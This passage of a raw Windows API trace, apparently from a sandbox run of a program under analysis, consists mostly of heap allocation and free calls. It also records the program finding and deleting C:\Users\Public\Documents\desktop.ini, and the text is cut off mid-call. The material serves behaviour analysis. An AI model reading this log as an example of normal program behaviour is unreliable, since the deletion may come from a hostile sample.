hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0267.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0267.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0267.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0267.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0267.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0267.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0267.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0267.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0267.145] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0267.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0267.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0267.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0267.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0267.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0267.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0267.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0267.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0267.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0267.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0267.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0267.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0267.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0267.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa538 [0267.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7a8 [0267.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa730 [0267.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0267.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa760 [0267.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0267.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0267.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa598 [0267.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0267.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0267.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.147] CloseHandle (hObject=0x2a0) returned 1 [0267.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0267.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0267.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3561010 | out: hHeap=0x25c0000) returned 1 [0267.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0267.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0267.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0267.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0267.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0267.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0267.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0267.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0267.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0267.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0267.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0267.154] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0267.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0267.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0267.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0267.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0267.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0267.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0267.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0267.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0267.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0267.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0267.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0267.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0267.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0267.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0267.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0267.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0267.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0267.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0267.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0267.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0267.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0267.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0267.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0267.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0267.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0267.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0267.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0267.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0267.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0267.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0267.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0267.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0267.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0267.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0267.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0267.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0267.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0267.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0267.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0267.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0267.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0267.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0267.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0267.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0267.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0267.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0267.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0267.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0267.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0267.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0267.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0267.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0267.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0267.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0267.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0267.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0267.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0267.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0267.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0267.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0267.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0267.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0267.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0267.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0267.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0267.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0267.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0267.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0267.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0267.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0267.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0267.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0267.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0267.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0267.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0267.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0267.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0267.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0267.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0267.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0267.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0267.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0267.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0267.159] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0267.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0267.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0267.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0267.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0267.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0267.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0267.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0267.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0267.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0267.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0267.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0267.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0267.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0267.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0267.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0267.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0267.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0267.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0267.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4c) returned 0x240a4d0 [0267.160] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents/desktop.ini", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\Public\\Documents\\desktop.ini", lpFilePart=0x8bedfc*="desktop.ini") returned 0x25 [0267.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0267.160] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents\\desktop.ini" (normalized: "c:\\users\\public\\documents\\desktop.ini")) returned 0x26 [0267.160] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\desktop.ini", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28697d55, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28697d55, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0x8bf068, dwReserved1=0x413764, cFileName="desktop.ini", cAlternateFileName="")) returned 0xaa58e0 [0267.161] DeleteFileW (lpFileName="C:\\Users\\Public\\Documents\\desktop.ini" (normalized: "c:\\users\\public\\documents\\desktop.ini")) returned 1 [0267.162] FindNextFileW (in: hFindFile=0xaa58e0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28697d55, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28697d55, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0x8bf068, dwReserved1=0x413764, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0267.162] FindClose (in: hFindFile=0xaa58e0 | out: hFindFile=0xaa58e0) returned 1 [0267.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0267.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0267.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0267.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0267.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0267.162] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0267.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0267.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0267.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0267.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0267.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0267.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0267.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0267.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0267.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0267.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0267.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0267.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0267.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0267.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0267.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0267.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0267.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0267.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0267.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0267.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0267.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0267.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0267.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0267.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0267.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0267.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0267.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0267.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0267.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0267.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4c) returned 0x240a4d0 [0267.164] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents/desktop.ini", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\Public\\Documents\\desktop.ini", lpFilePart=0x8bf658*="desktop.ini") returned 0x25 [0267.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0267.164] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents\\desktop.ini" (normalized: "c:\\users\\public\\documents\\desktop.ini")) returned 0xffffffff [0267.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0267.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0267.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0267.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0267.165] HeapFree (in: 